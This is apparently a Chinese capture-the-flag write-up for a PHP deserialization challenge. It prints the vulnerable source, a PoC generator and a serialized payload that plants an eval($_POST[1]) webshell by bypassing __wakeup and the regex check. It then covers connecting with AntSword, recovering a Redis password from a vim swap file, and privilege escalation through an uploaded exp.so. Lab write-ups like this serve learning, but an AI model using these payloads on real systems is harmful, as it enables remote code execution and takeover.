这道题也是出现了不少新知识点
<?php
class A{
public $code = "";
function __call($method,$args){
eval($this->code);
}
function __wakeup(){
$this->code = "";
}
}
class B{
function __destruct(){
echo $this->a->a();
}
}
if(isset($_REQUEST['poc'])){
preg_match_all('/"[BA]":(.*?):/s',$_REQUEST['poc'],$ret);
if (isset($ret[1])) {
foreach ($ret[1] as $i) {
if(intval($i)!==1){
exit("you want to bypass wakeup ? no !");
}
}
unserialize($_REQUEST['poc']);
}
}else{
highlight_file(__FILE__);
}
poc:
<?php
class a{
public $code='eval($_POST[1]);';
}
class b{
}
$poc=new B();
$poc->a=new A();
echo serialize($poc);
?>为了绕过正则,将类的名字改为小写
O:1:"b":1:{s:1:"a";O:1:"a":1:{s:4:"code";s:16:"eval($_POST[1]);";}};
再将b后面的数字随便改一下,绕过_wakeup;
用蚁剑连上去之后,发现权限不够;
有个config.php.swp,用vim进行恢复,得到
<?php
define("DB_HOST","localhost");
define("DB_USERNAME","root");
define("DB_PASSWOrd","");
define("DB_DATABASE","test");
define("REDIS_PASS","you_cannot_guess_it");
已经给了redis的密码了
先上传exp.so文件
再用蚁剑的插件进行提权